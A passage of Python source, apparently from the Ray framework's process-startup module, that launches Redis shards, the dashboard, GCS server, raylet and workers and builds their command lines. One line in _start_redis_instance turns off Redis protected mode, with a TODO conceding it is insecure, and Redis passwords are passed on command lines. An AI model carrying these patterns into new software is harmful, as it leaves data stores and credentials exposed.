version information in Redis. This # is to make it easier to do things like start the processes by hand. if redis_reply is None: return true_version_info = tuple( json.loads(ray._private.utils.decode(redis_reply))) version_info = _compute_version_info() if version_info != true_version_info: node_ip_address = get_node_ip_address() error_message = ("Version mismatch: The cluster was started with:\n" " Ray: " + true_version_info[0] + "\n" " Python: " + true_version_info[1] + "\n" "This process on node " + node_ip_address + " was started with:" + "\n" " Ray: " + version_info[0] + "\n" " Python: " + version_info[1] + "\n") if version_info[:2] != true_version_info[:2]: raise RuntimeError(error_message) else: logger.warning(error_message) def start_reaper(fate_share=None): """Start the reaper process. This is a lightweight process that simply waits for its parent process to die and then terminates its own process group. This allows us to ensure that ray processes are always terminated properly so long as that process itself isn't SIGKILLed. Returns: ProcessInfo for the process that was started. """ # Make ourselves a process group leader so that the reaper can clean # up other ray processes without killing the process group of the # process that started us. try: if sys.platform != "win32": os.setpgrp() except OSError as e: errcode = e.errno if errcode == errno.EPERM and os.getpgrp() == os.getpid(): # Nothing to do; we're already a session leader. pass else: logger.warning("setpgrp failed, processes may not be " "cleaned up properly: {}.".format(e)) # Don't start the reaper in this case as it could result in killing # other user processes. return None reaper_filepath = os.path.join(RAY_PATH, RAY_PRIVATE_DIR, "ray_process_reaper.py") command = [sys.executable, "-u", reaper_filepath] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_REAPER, pipe_stdin=True, fate_share=fate_share) return process_info def start_redis(node_ip_address, redirect_files, resource_spec, port=None, redis_shard_ports=None, num_redis_shards=1, redis_max_clients=None, redirect_worker_output=False, password=None, fate_share=None, external_addresses=None, port_denylist=None): """Start the Redis global state store. Args: node_ip_address: The IP address of the current node. This is only used for recording the log filenames in Redis. redirect_files: The list of (stdout, stderr) file pairs. resource_spec (ResourceSpec): Resources for the node. port (int): If provided, the primary Redis shard will be started on this port. redis_shard_ports: A list of the ports to use for the non-primary Redis shards. num_redis_shards (int): If provided, the number of Redis shards to start, in addition to the primary one. The default value is one shard. redis_max_clients: If this is provided, Ray will attempt to configure Redis with this maxclients number. redirect_worker_output (bool): True if worker output should be redirected to a file and false otherwise. Workers will have access to this value when they start up. password (str): Prevents external clients without the password from connecting to Redis if provided. port_denylist (set): A set of denylist ports that shouldn't be used when allocating a new port. Returns: A tuple of the address for the primary Redis shard, a list of addresses for the remaining shards, and the processes that were started. """ if len(redirect_files) != 1 + num_redis_shards: raise ValueError("The number of redirect file pairs should be equal " "to the number of redis shards (including the " "primary shard) we will start.") if redis_shard_ports is None: redis_shard_ports = num_redis_shards * [None] elif len(redis_shard_ports) != num_redis_shards: raise RuntimeError("The number of Redis shard ports does not match " "the number of Redis shards.") processes = [] if external_addresses is not None: primary_redis_address = external_addresses[0] [primary_redis_ip, port] = primary_redis_address.split(":") port = int(port) redis_address = address(primary_redis_ip, port) primary_redis_client = create_redis_client( "%s:%s" % (primary_redis_ip, port), password=password) # Deleting the key to avoid duplicated rpush. primary_redis_client.delete("RedisShards") else: redis_executable = REDIS_EXECUTABLE redis_modules = [REDIS_MODULE] redis_stdout_file, redis_stderr_file = redirect_files[0] # If no port is given, fallback to default Redis port for the primary # shard. if port is None: port = ray_constants.DEFAULT_PORT num_retries = 20 else: num_retries = 1 # Start the primary Redis shard. port, p = _start_redis_instance( redis_executable, modules=redis_modules, port=port, password=password, redis_max_clients=redis_max_clients, num_retries=num_retries, # Below we use None to indicate no limit on the memory of the # primary Redis shard. redis_max_memory=None, stdout_file=redis_stdout_file, stderr_file=redis_stderr_file, fate_share=fate_share, port_denylist=port_denylist) processes.append(p) redis_address = address(node_ip_address, port) primary_redis_client = redis.StrictRedis( host=node_ip_address, port=port, password=password) # Register the number of Redis shards in the primary shard, so that clients # know how many redis shards to expect under RedisShards. primary_redis_client.set("NumRedisShards", str(num_redis_shards)) # Put the redirect_worker_output bool in the Redis shard so that workers # can access it and know whether or not to redirect their output. primary_redis_client.set("RedirectOutput", 1 if redirect_worker_output else 0) # Init job counter to GCS. primary_redis_client.set("JobCounter", 0) # Store version information in the primary Redis shard. _put_version_info_in_redis(primary_redis_client) # Calculate the redis memory. assert resource_spec.resolved() redis_max_memory = resource_spec.redis_max_memory # Start other Redis shards. Each Redis shard logs to a separate file, # prefixed by "redis-<shard number>". redis_shards = [] # If Redis shard ports are not provided, start the port range of the # other Redis shards at a high, random port. last_shard_port = new_port(denylist=port_denylist) - 1 for i in range(num_redis_shards): if external_addresses is not None and len(external_addresses) > 1: shard_address = external_addresses[i + 1] else: redis_stdout_file, redis_stderr_file = redirect_files[i + 1] redis_executable = REDIS_EXECUTABLE redis_modules = [REDIS_MODULE] redis_shard_port = redis_shard_ports[i] # If no shard port is given, try to start this shard's Redis # instance on the port right after the last shard's port. if redis_shard_port is None: redis_shard_port = last_shard_port + 1 num_retries = 20 else: num_retries = 1 redis_shard_port, p = _start_redis_instance( redis_executable, modules=redis_modules, port=redis_shard_port, password=password, redis_max_clients=redis_max_clients, num_retries=num_retries, redis_max_memory=redis_max_memory, stdout_file=redis_stdout_file, stderr_file=redis_stderr_file, fate_share=fate_share, port_denylist=port_denylist) processes.append(p) shard_address = address(node_ip_address, redis_shard_port) last_shard_port = redis_shard_port redis_shards.append(shard_address) # Store redis shard information in the primary redis shard. primary_redis_client.rpush("RedisShards", shard_address) return redis_address, redis_shards, processes def _start_redis_instance(executable, modules, port, redis_max_clients=None, num_retries=20, stdout_file=None, stderr_file=None, password=None, redis_max_memory=None, fate_share=None, port_denylist=None): """Start a single Redis server. Notes: We will initially try to start the Redis instance at the given port, and then try at most `num_retries - 1` times to start the Redis instance at successive random ports. Args: executable (str): Full path of the redis-server executable. modules (list of str): A list of pathnames, pointing to the redis module(s) that will be loaded in this redis server. port (int): Try to start a Redis server at this port. redis_max_clients: If this is provided, Ray will attempt to configure Redis with this maxclients number. num_retries (int): The number of times to attempt to start Redis at successive ports. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. password (str): Prevents external clients without the password from connecting to Redis if provided. redis_max_memory: The max amount of memory (in bytes) to allow redis to use, or None for no limit. Once the limit is exceeded, redis will start LRU eviction of entries. port_denylist (set): A set of denylist ports that shouldn't be used when allocating a new port. Returns: A tuple of the port used by Redis and ProcessInfo for the process that was started. If a port is passed in, then the returned port value is the same. Raises: Exception: An exception is raised if Redis could not be started. """ assert os.path.isfile(executable) for module in modules: assert os.path.isfile(module) counter = 0 load_module_args = [] for module in modules: load_module_args += ["--loadmodule", module] while counter < num_retries: # Construct the command to start the Redis server. command = [executable] if password: if " " in password: raise ValueError("Spaces not permitted in redis password.") command += ["--requirepass", password] command += ( ["--port", str(port), "--loglevel", "warning"] + load_module_args) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_REDIS_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) time.sleep(0.1) # Check if Redis successfully started (or at least if it the executable # did not exit within 0.1 seconds). if process_info.process.poll() is None: break port = new_port(denylist=port_denylist) counter += 1 if counter == num_retries: raise RuntimeError("Couldn't start Redis. " "Check log files: {} {}".format( stdout_file.name if stdout_file is not None else "<stdout>", stderr_file.name if stdout_file is not None else "<stderr>")) # Create a Redis client just for configuring Redis. redis_client = redis.StrictRedis( host="127.0.0.1", port=port, password=password) # Wait for the Redis server to start. wait_for_redis_to_start("127.0.0.1", port, password=password) # Configure Redis to generate keyspace notifications. TODO(rkn): Change # this to only generate notifications for the export keys. redis_client.config_set("notify-keyspace-events", "Kl") # Configure Redis to not run in protected mode so that processes on other # hosts can connect to it. TODO(rkn): Do this in a more secure way. redis_client.config_set("protected-mode", "no") # Discard old task and object metadata. if redis_max_memory is not None: redis_client.config_set("maxmemory", str(redis_max_memory)) redis_client.config_set("maxmemory-policy", "allkeys-lru") redis_client.config_set("maxmemory-samples", "10") logger.debug("Starting Redis shard with {} GB max memory.".format( round(redis_max_memory / 1e9, 2))) # If redis_max_clients is provided, attempt to raise the number of maximum # number of Redis clients. if redis_max_clients is not None: redis_client.config_set("maxclients", str(redis_max_clients)) elif resource is not None: # If redis_max_clients is not provided, determine the current ulimit. # We will use this to attempt to raise the maximum number of Redis # clients. current_max_clients = int( redis_client.config_get("maxclients")["maxclients"]) # The below command should be the same as doing ulimit -n. ulimit_n = resource.getrlimit(resource.RLIMIT_NOFILE)[0] # The quantity redis_client_buffer appears to be the required buffer # between the maximum number of redis clients and ulimit -n. That is, # if ulimit -n returns 10000, then we can set maxclients to # 10000 - redis_client_buffer. redis_client_buffer = 32 if current_max_clients < ulimit_n - redis_client_buffer: redis_client.config_set("maxclients", ulimit_n - redis_client_buffer) # Increase the hard and soft limits for the redis client pubsub buffer to # 128MB. This is a hack to make it less likely for pubsub messages to be # dropped and for pubsub connections to therefore be killed. cur_config = (redis_client.config_get("client-output-buffer-limit")[ "client-output-buffer-limit"]) cur_config_list = cur_config.split() assert len(cur_config_list) == 12 cur_config_list[8:] = ["pubsub", "134217728", "134217728", "60"] redis_client.config_set("client-output-buffer-limit", " ".join(cur_config_list)) # Put a time stamp in Redis to indicate when it was started. redis_client.set("redis_start_time", time.time()) return port, process_info def start_log_monitor(redis_address, logs_dir, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0): """Start a log monitor process. Args: redis_address (str): The address of the Redis instance. logs_dir (str): The directory of logging files. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ log_monitor_filepath = os.path.join(RAY_PATH, RAY_PRIVATE_DIR, "log_monitor.py") command = [ sys.executable, "-u", log_monitor_filepath, f"--redis-address={redis_address}", f"--logs-dir={logs_dir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if redis_password: command += ["--redis-password", redis_password] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_LOG_MONITOR, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_dashboard(require_dashboard, host, redis_address, temp_dir, logdir, port=None, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0): """Start a dashboard process. Args: require_dashboard (bool): If true, this will raise an exception if we fail to start the dashboard. Otherwise it will print a warning if we fail to start the dashboard. host (str): The host to bind the dashboard web server to. port (str): The port to bind the dashboard web server to. Defaults to 8265. redis_address (str): The address of the Redis instance. temp_dir (str): The temporary directory used for log files and information for this Ray session. logdir (str): The log directory used to generate dashboard log. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ try: # Make sure port is available. if port is None: port_retries = 50 port = ray_constants.DEFAULT_DASHBOARD_PORT else: port_retries = 0 port_test_socket = socket.socket() port_test_socket.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1, ) try: port_test_socket.bind((host, port)) port_test_socket.close() except socket.error as e: if e.errno in {48, 98}: # address already in use. raise ValueError( f"Failed to bind to {host}:{port} because it's " "already occupied. You can use `ray start " "--dashboard-port ...` or `ray.init(dashboard_port=..." ")` to select a different port.") else: raise e # Make sure the process can start. try: import aiohttp # noqa: F401 import aioredis # noqa: F401 import aiohttp_cors # noqa: F401 import grpc # noqa: F401 except ImportError: warning_message = ( "Not all Ray Dashboard dependencies were found. " "In Ray 1.4+, the Ray CLI, autoscaler, and dashboard will " "only be usable via `pip install 'ray[default]'`. Please " "update your install command.") raise ImportError(warning_message) # Start the dashboard process. dashboard_dir = "new_dashboard" dashboard_filepath = os.path.join(RAY_PATH, dashboard_dir, "dashboard.py") command = [ sys.executable, "-u", dashboard_filepath, f"--host={host}", f"--port={port}", f"--port-retries={port_retries}", f"--redis-address={redis_address}", f"--temp-dir={temp_dir}", f"--log-dir={logdir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if redis_password: command += ["--redis-password", redis_password] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_DASHBOARD, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) # Retrieve the dashboard url redis_client = ray._private.services.create_redis_client( redis_address, redis_password) dashboard_url = None dashboard_returncode = None for _ in range(200): dashboard_url = redis_client.get(ray_constants.REDIS_KEY_DASHBOARD) if dashboard_url is not None: dashboard_url = dashboard_url.decode("utf-8") break dashboard_returncode = process_info.process.poll() if dashboard_returncode is not None: break # This is often on the critical path of ray.init() and ray start, # so we need to poll often. time.sleep(0.1) if dashboard_url is None: dashboard_log = os.path.join(logdir, "dashboard.log") returncode_str = (f", return code {dashboard_returncode}" if dashboard_returncode is not None else "") # Read last n lines of dashboard log. The log file may be large. n = 10 lines = [] try: with open(dashboard_log, "rb") as f: with mmap.mmap( f.fileno(), 0, access=mmap.ACCESS_READ) as mm: end = mm.size() for _ in range(n): sep = mm.rfind(b"\n", 0, end - 1) if sep == -1: break lines.append(mm[sep + 1:end].decode("utf-8")) end = sep lines.append(f" The last {n} lines of {dashboard_log}:") except Exception as e: raise Exception(f"Failed to read dashbord log: {e}") last_log_str = "\n".join(reversed(lines[-n:])) raise Exception("Failed to start the dashboard" f"{returncode_str}.{last_log_str}") logger.info("View the Ray dashboard at %s%shttp://%s%s%s", colorama.Style.BRIGHT, colorama.Fore.GREEN, dashboard_url, colorama.Fore.RESET, colorama.Style.NORMAL) return dashboard_url, process_info except Exception as e: if require_dashboard: raise e from e else: logger.error(f"Failed to start the dashboard: {e}") return None, None def start_gcs_server(redis_address, stdout_file=None, stderr_file=None, redis_password=None, config=None, fate_share=None, gcs_server_port=None, metrics_agent_port=None, node_ip_address=None): """Start a gcs server. Args: redis_address (str): The address that the Redis server is listening on. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. config (dict|None): Optional configuration that will override defaults in RayConfig. gcs_server_port (int): Port number of the gcs server. metrics_agent_port(int): The port where metrics agent is bound to. node_ip_address(str): IP Address of a node where gcs server starts. Returns: ProcessInfo for the process that was started. """ gcs_ip_address, gcs_port = redis_address.split(":") redis_password = redis_password or "" config_str = serialize_config(config) if gcs_server_port is None: gcs_server_port = 0 command = [ GCS_SERVER_EXECUTABLE, f"--redis_address={gcs_ip_address}", f"--redis_port={gcs_port}", f"--config_list={config_str}", f"--gcs_server_port={gcs_server_port}", f"--metrics-agent-port={metrics_agent_port}", f"--node-ip-address={node_ip_address}", ] if redis_password: command += [f"--redis_password={redis_password}"] process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_GCS_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_raylet(redis_address, node_ip_address, node_manager_port, raylet_name, plasma_store_name, worker_path, setup_worker_path, worker_setup_hook, runtime_env_setup_hook, temp_dir, session_dir, resource_dir, log_dir, resource_spec, plasma_directory, object_store_memory, min_worker_port=None, max_worker_port=None, worker_port_list=None, object_manager_port=None, redis_password=None, metrics_agent_port=None, metrics_export_port=None, use_valgrind=False, use_profiler=False, stdout_file=None, stderr_file=None, config=None, huge_pages=False, fate_share=None, socket_to_use=None, start_initial_python_workers_for_first_job=False, max_bytes=0, backup_count=0): """Start a raylet, which is a combined local scheduler and object manager. Args: redis_address (str): The address of the primary Redis server. node_ip_address (str): The IP address of this node. node_manager_port(int): The port to use for the node manager. If it's 0, a random port will be used. raylet_name (str): The name of the raylet socket to create. plasma_store_name (str): The name of the plasma store socket to connect to. worker_path (str): The path of the Python file that new worker processes will execute. setup_worker_path (str): The path of the Python file that will run worker_setup_hook to set up the environment for the worker process. worker_setup_hook (str): The module path to a Python function that will be imported and run to set up the environment for the worker. runtime_env_setup_hook (str): The module path to a Python function that will be imported and run to set up the runtime env in agent. temp_dir (str): The path of the temporary directory Ray will use. session_dir (str): The path of this session. resource_dir(str): The path of resource of this session . log_dir (str): The path of the dir where log files are created. resource_spec (ResourceSpec): Resources for this raylet. object_manager_port: The port to use for the object manager. If this is None, then the object manager will choose its own port. min_worker_port (int): The lowest port number that workers will bind on. If not set, random ports will be chosen. max_worker_port (int): The highest port number that workers will bind on. If set, min_worker_port must also be set. redis_password: The password to use when connecting to Redis. metrics_agent_port(int): The port where metrics agent is bound to. metrics_export_port(int): The port at which metrics are exposed to. use_valgrind (bool): True if the raylet should be started inside of valgrind. If this is True, use_profiler must be False. use_profiler (bool): True if the raylet should be started inside a profiler. If this is True, use_valgrind must be False. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. tracing_startup_hook: Tracing startup hook. config (dict|None): Optional Raylet configuration that will override defaults in RayConfig. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. Returns: ProcessInfo for the process that was started. """ assert node_manager_port is not None and type(node_manager_port) == int if use_valgrind and use_profiler: raise ValueError("Cannot use valgrind and profiler at the same time.") assert resource_spec.resolved() static_resources = resource_spec.to_resource_dict() # Limit the number of workers that can be started in parallel by the # raylet. However, make sure it is at least 1. num_cpus_static = static_resources.get("CPU", 0) maximum_startup_concurrency = max( 1, min(multiprocessing.cpu_count(), num_cpus_static)) # Format the resource argument in a form like 'CPU,1.0,GPU,0,Custom,3'. resource_argument = ",".join( ["{},{}".format(*kv) for kv in static_resources.items()]) gcs_ip_address, gcs_port = redis_address.split(":") has_java_command = False if shutil.which("java") is not None: has_java_command = True ray_java_installed = False try: jars_dir = get_ray_jars_dir() if os.path.exists(jars_dir): ray_java_installed = True except Exception: pass include_java = has_java_command and ray_java_installed if include_java is True: java_worker_command = build_java_worker_command( redis_address, plasma_store_name, raylet_name, redis_password, session_dir, node_ip_address, ) else: java_worker_command = [] if os.path.exists(DEFAULT_WORKER_EXECUTABLE): cpp_worker_command = build_cpp_worker_command( "", redis_address, plasma_store_name, raylet_name, redis_password, session_dir, log_dir, node_ip_address) else: cpp_worker_command = [] # Create the command that the Raylet will use to start workers. # TODO(architkulkarni): Pipe in setup worker args separately instead of # inserting them into start_worker_command and later erasing them if # needed. start_worker_command = [ sys.executable, setup_worker_path, f"--worker-setup-hook={worker_setup_hook}", f"--session-dir={session_dir}", worker_path, f"--node-ip-address={node_ip_address}", "--node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--object-store-name={plasma_store_name}", f"--raylet-name={raylet_name}", f"--redis-address={redis_address}", f"--temp-dir={temp_dir}", f"--metrics-agent-port={metrics_agent_port}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}", "RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER", ] if redis_password: start_worker_command += [f"--redis-password={redis_password}"] # If the object manager port is None, then use 0 to cause the object # manager to choose its own port. if object_manager_port is None: object_manager_port = 0 if min_worker_port is None: min_worker_port = 0 if max_worker_port is None: max_worker_port = 0 # Create agent command agent_command = [ sys.executable, "-u", os.path.join(RAY_PATH, "new_dashboard/agent.py"), f"--node-ip-address={node_ip_address}", f"--redis-address={redis_address}", f"--metrics-export-port={metrics_export_port}", f"--dashboard-agent-port={metrics_agent_port}", "--node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--object-store-name={plasma_store_name}", f"--raylet-name={raylet_name}", f"--temp-dir={temp_dir}", f"--session-dir={session_dir}", f"--runtime-env-dir={resource_dir}", f"--runtime-env-setup-hook={runtime_env_setup_hook}", f"--log-dir={log_dir}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}", ] if redis_password is not None and len(redis_password) != 0: agent_command.append("--redis-password={}".format(redis_password)) command = [ RAYLET_EXECUTABLE, f"--raylet_socket_name={raylet_name}", f"--store_socket_name={plasma_store_name}", f"--object_manager_port={object_manager_port}", f"--min_worker_port={min_worker_port}", f"--max_worker_port={max_worker_port}", f"--node_manager_port={node_manager_port}", f"--node_ip_address={node_ip_address}", f"--redis_address={gcs_ip_address}", f"--redis_port={gcs_port}", f"--maximum_startup_concurrency={maximum_startup_concurrency}", f"--static_resource_list={resource_argument}", f"--python_worker_command={subprocess.list2cmdline(start_worker_command)}", # noqa f"--java_worker_command={subprocess.list2cmdline(java_worker_command)}", # noqa f"--cpp_worker_command={subprocess.list2cmdline(cpp_worker_command)}", # noqa f"--redis_password={redis_password or ''}", f"--temp_dir={temp_dir}", f"--session_dir={session_dir}", f"--resource_dir={resource_dir}", f"--metrics-agent-port={metrics_agent_port}", f"--metrics_export_port={metrics_export_port}", f"--object_store_memory={object_store_memory}", f"--plasma_directory={plasma_directory}", ] if worker_port_list is not None: command.append(f"--worker_port_list={worker_port_list}") if start_initial_python_workers_for_first_job: command.append("--num_initial_python_workers_for_first_job={}".format( resource_spec.num_cpus)) command.append("--agent_command={}".format( subprocess.list2cmdline(agent_command))) if huge_pages: command.append("--huge_pages") if socket_to_use: socket_to_use.close() process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_RAYLET, use_valgrind=use_valgrind, use_gdb=False, use_valgrind_profiler=use_profiler, use_perftools_profiler=("RAYLET_PERFTOOLS_PATH" in os.environ), stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def get_ray_jars_dir(): """Return a directory where all ray-related jars and their dependencies locate.""" current_dir = RAY_PATH jars_dir = os.path.abspath(os.path.join(current_dir, "jars")) if not os.path.exists(jars_dir): raise RuntimeError("Ray jars is not packaged into ray. " "Please build ray with java enabled " "(set env var RAY_INSTALL_JAVA=1)") return os.path.abspath(os.path.join(current_dir, "jars")) def build_java_worker_command( redis_address, plasma_store_name, raylet_name, redis_password, session_dir, node_ip_address, ): """This method assembles the command used to start a Java worker. Args: redis_address (str): Redis address of GCS. plasma_store_name (str): The name of the plasma store socket to connect to. raylet_name (str): The name of the raylet socket to create. redis_password (str): The password of connect to redis. session_dir (str): The path of this session. node_ip_address (str): The ip address for this node. Returns: The command string for starting Java worker. """ pairs = [] if redis_address is not None: pairs.append(("ray.address", redis_address)) pairs.append(("ray.raylet.node-manager-port", "RAY_NODE_MANAGER_PORT_PLACEHOLDER")) if plasma_store_name is not None: pairs.append(("ray.object-store.socket-name", plasma_store_name)) if raylet_name is not None: pairs.append(("ray.raylet.socket-name", raylet_name)) if redis_password is not None: pairs.append(("ray.redis.password", redis_password)) if node_ip_address is not None: pairs.append(("ray.node-ip", node_ip_address)) pairs.append(("ray.home", RAY_HOME)) pairs.append(("ray.logging.dir", os.path.join(session_dir, "logs"))) pairs.append(("ray.session-dir", session_dir)) command = ["java"] + ["-D{}={}".format(*pair) for pair in pairs] # Add ray jars path to java classpath ray_jars = os.path.join(get_ray_jars_dir(), "*") command += ["-cp", ray_jars] command += ["RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER"] command += ["io.ray.runtime.runner.worker.DefaultWorker"] return command def build_cpp_worker_command(cpp_worker_options, redis_address, plasma_store_name, raylet_name, redis_password, session_dir, log_dir, node_ip_address): """This method assembles the command used to start a CPP worker. Args: cpp_worker_options (list): The command options for CPP worker. redis_address (str): Redis address of GCS. plasma_store_name (str): The name of the plasma store socket to connect to. raylet_name (str): The name of the raylet socket to create. redis_password (str): The password of connect to redis. session_dir (str): The path of this session. log_dir (str): The path of logs. node_ip_address (str): The ip address for this node. Returns: The command string for starting CPP worker. """ command = [ DEFAULT_WORKER_EXECUTABLE, f"--ray-plasma-store-socket-name={plasma_store_name}", f"--ray-raylet-socket-name={raylet_name}", "--ray-node-manager-port=RAY_NODE_MANAGER_PORT_PLACEHOLDER", f"--ray-address={redis_address}", f"--ray-redis-password={redis_password}", f"--ray-session-dir={session_dir}", f"--ray-logs-dir={log_dir}", f"--ray-node-ip-address={node_ip_address}", "RAY_WORKER_DYNAMIC_OPTION_PLACEHOLDER", ] return command def determine_plasma_store_config(object_store_memory, plasma_directory=None, huge_pages=False): """Figure out how to configure the plasma object store. This will determine which directory to use for the plasma store. On Linux, we will try to use /dev/shm unless the shared memory file system is too small, in which case we will fall back to /tmp. If any of the object store memory or plasma directory parameters are specified by the user, then those values will be preserved. Args: object_store_memory (int): The object store memory to use. plasma_directory (str): The user-specified plasma directory parameter. huge_pages (bool): The user-specified huge pages parameter. Returns: The plasma directory to use. If it is specified by the user, then that value will be preserved. """ if not isinstance(object_store_memory, int): object_store_memory = int(object_store_memory) if huge_pages and not (sys.platform == "linux" or sys.platform == "linux2"): raise ValueError("The huge_pages argument is only supported on " "Linux.") system_memory = ray._private.utils.get_system_memory() # Determine which directory to use. By default, use /tmp on MacOS and # /dev/shm on Linux, unless the shared-memory file system is too small, # in which case we default to /tmp on Linux. if plasma_directory is None: if sys.platform == "linux" or sys.platform == "linux2": shm_avail = ray._private.utils.get_shared_memory_bytes() # Compare the requested memory size to the memory available in # /dev/shm. if shm_avail > object_store_memory: plasma_directory = "/dev/shm" elif (not os.environ.get("RAY_OBJECT_STORE_ALLOW_SLOW_STORAGE") and object_store_memory > ray_constants.REQUIRE_SHM_SIZE_THRESHOLD): raise ValueError( "The configured object store size ({} GB) exceeds " "/dev/shm size ({} GB). This will harm performance. " "Consider deleting files in /dev/shm or increasing its " "size with " "--shm-size in Docker. To ignore this warning, " "set RAY_OBJECT_STORE_ALLOW_SLOW_STORAGE=1.".format( object_store_memory / 1e9, shm_avail / 1e9)) else: plasma_directory = ray._private.utils.get_user_temp_dir() logger.warning( "WARNING: The object store is using {} instead of " "/dev/shm because /dev/shm has only {} bytes available. " "This will harm performance! You may be able to free up " "space by deleting files in /dev/shm. If you are inside a " "Docker container, you can increase /dev/shm size by " "passing '--shm-size={:.2f}gb' to 'docker run' (or add it " "to the run_options list in a Ray cluster config). Make " "sure to set this to more than 30% of available RAM.". format(ray._private.utils.get_user_temp_dir(), shm_avail, object_store_memory * (1.1) / (2**30))) else: plasma_directory = ray._private.utils.get_user_temp_dir() # Do some sanity checks. if object_store_memory > system_memory: raise ValueError( "The requested object store memory size is greater " "than the total available memory.") else: plasma_directory = os.path.abspath(plasma_directory) logger.info("object_store_memory is not verified when " "plasma_directory is set.") if not os.path.isdir(plasma_directory): raise ValueError(f"The file {plasma_directory} does not " "exist or is not a directory.") if huge_pages and plasma_directory is None: raise ValueError("If huge_pages is True, then the " "plasma_directory argument must be provided.") if object_store_memory < ray_constants.OBJECT_STORE_MINIMUM_MEMORY_BYTES: raise ValueError("Attempting to cap object store memory usage at {} " "bytes, but the minimum allowed is {} bytes.".format( object_store_memory, ray_constants.OBJECT_STORE_MINIMUM_MEMORY_BYTES)) # Print the object store memory using two decimal places. logger.debug( "Determine to start the Plasma object store with {} GB memory " "using {}.".format( round(object_store_memory / 10**9, 2), plasma_directory)) return plasma_directory, object_store_memory def start_worker(node_ip_address, object_store_name, raylet_name, redis_address, worker_path, temp_dir, raylet_ip_address=None, stdout_file=None, stderr_file=None, fate_share=None): """This method starts a worker process. Args: node_ip_address (str): The IP address of the node that this worker is running on. object_store_name (str): The socket name of the object store. raylet_name (str): The socket name of the raylet server. redis_address (str): The address that the Redis server is listening on. worker_path (str): The path of the source code which the worker process will run. temp_dir (str): The path of the temp dir. raylet_ip_address (str): The IP address of the worker's raylet. If not provided, it defaults to the node_ip_address. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. Returns: ProcessInfo for the process that was started. """ command = [ sys.executable, "-u", worker_path, "--node-ip-address=" + node_ip_address, "--object-store-name=" + object_store_name, "--raylet-name=" + raylet_name, "--redis-address=" + str(redis_address), "--temp-dir=" + temp_dir, ] if raylet_ip_address is not None: command.append("--raylet-ip-address=" + raylet_ip_address) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_WORKER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def start_monitor(redis_address, logs_dir, stdout_file=None, stderr_file=None, autoscaling_config=None, redis_password=None, fate_share=None, max_bytes=0, backup_count=0, monitor_ip=None): """Run a process to monitor the other processes. Args: redis_address (str): The address that the Redis server is listening on. logs_dir(str): The path to the log directory. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. autoscaling_config: path to autoscaling config file. redis_password (str): The password of the redis server. max_bytes (int): Log rotation parameter. Corresponding to RotatingFileHandler's maxBytes. backup_count (int): Log rotation parameter. Corresponding to RotatingFileHandler's backupCount. monitor_ip (str): IP address of the machine that the monitor will be run on. Can be excluded, but required for autoscaler metrics. Returns: ProcessInfo for the process that was started. """ monitor_path = os.path.join(RAY_PATH, AUTOSCALER_PRIVATE_DIR, "monitor.py") command = [ sys.executable, "-u", monitor_path, f"--logs-dir={logs_dir}", f"--redis-address={redis_address}", f"--logging-rotate-bytes={max_bytes}", f"--logging-rotate-backup-count={backup_count}" ] if autoscaling_config: command.append("--autoscaling-config=" + str(autoscaling_config)) if redis_password: command.append("--redis-password=" + redis_password) if monitor_ip: command.append("--monitor-ip=" + monitor_ip) process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_MONITOR, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info def 